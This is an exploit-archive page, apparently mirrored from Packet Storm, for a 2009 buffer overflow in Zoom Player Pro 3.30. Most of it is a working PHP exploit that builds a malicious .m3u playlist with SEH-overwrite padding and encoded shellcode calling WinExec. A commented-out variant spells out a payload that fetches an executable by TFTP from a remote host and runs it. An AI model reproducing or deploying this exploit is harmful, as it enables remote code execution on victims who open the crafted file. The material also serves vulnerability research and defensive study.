Zoom Player Pro 3.30 Buffer Overflow

🗓️ 28 Apr 2009 00:00:00Reported by Nine:Situations:GroupType

packetstorm🔗 packetstormsecurity.com👁 18 Views

Zoom Player Pro 3.30 Buffer Overflow exploit

`<?php  
/*  
Zoom Player Pro v.3.30 .m3u file buffer overflow exploit (seh)  
by Nine:Situations:Group::surfista  
  
seems the same of http://secunia.com/advisories/28214/  
bug found by Luigi Auriemma  
no full working exploit out, so I made my test version  
/*  
/*  
//original shellcode, 27 bytes + command  
//re-encode with  
//alpha2 --unicode ecx <sh.txt  
$scode =  
"\xeb\x13\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4a\x53".  
"\xbb\x0d\x25\x86\x7c". //WinExec, kernel32.dll XP SP3  
"\xff\xd3\x31\xc0\xe8\xe8\xff\xff\xff".  
"cmd /c tftp -i 192.168.0.1 GET s s.exe && s && ".  
"\xff";  
*/  
  
$_scode="IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1".  
"AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBhkMC1Kn".  
"QWPnpNQGP3XPCPJaCEkJmo5TFsLYoHSNQUpiXgxyoKOKOosPmOtKpNOQSKp1d36rTp".  
"pkpNMpimPNQp9nRlnnQP6lxNNlplnP1MPPGQ524O0RSO02SnN35rXPeKpLfKvKp43kpkvmVMPkOA";  
  
$buff="\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x68\x74\x74\x70\x3a\x2f\x2f".  
"\x77\x77\x77".  
str_repeat("\x61",0xfe8).  
/* unicode preamble, alignment */  
"\x6e". //add byte ptr [esi],ch, nop equivalent [*]  
"\xd3\x45". //0x004500d3 unicode friendly pop - pop - ret, zplayer.exe  
"\x6e". //*  
"\x05\x7f\x4c". //add eax,4c007f00h  
"\x6e". //*  
"\x2d\x59\x4c". //sub eax,4c005900h  
"\x6e". //*  
"\x50". //push eax  
"\x6e". //*  
"\x59". //pop ecx  
str_repeat("\x6e\x90",0x7f). //nop  
"\x6e". //*  
"\x6a". //push 0, nop equivalent  
$_scode.  
str_repeat("\x90",0xbb8);  
$_fp=@fopen("pwn.m3u","w+");  
if (!$_fp) { die("[:(] Failed to create file...");}  
fputs($_fp,$buff);  
fclose($_fp);  
print("[:)] Done!");  
?>  
  
  
`

28 Apr 2009 00:00Current

0.8Low risk

Vulners AI Score0.8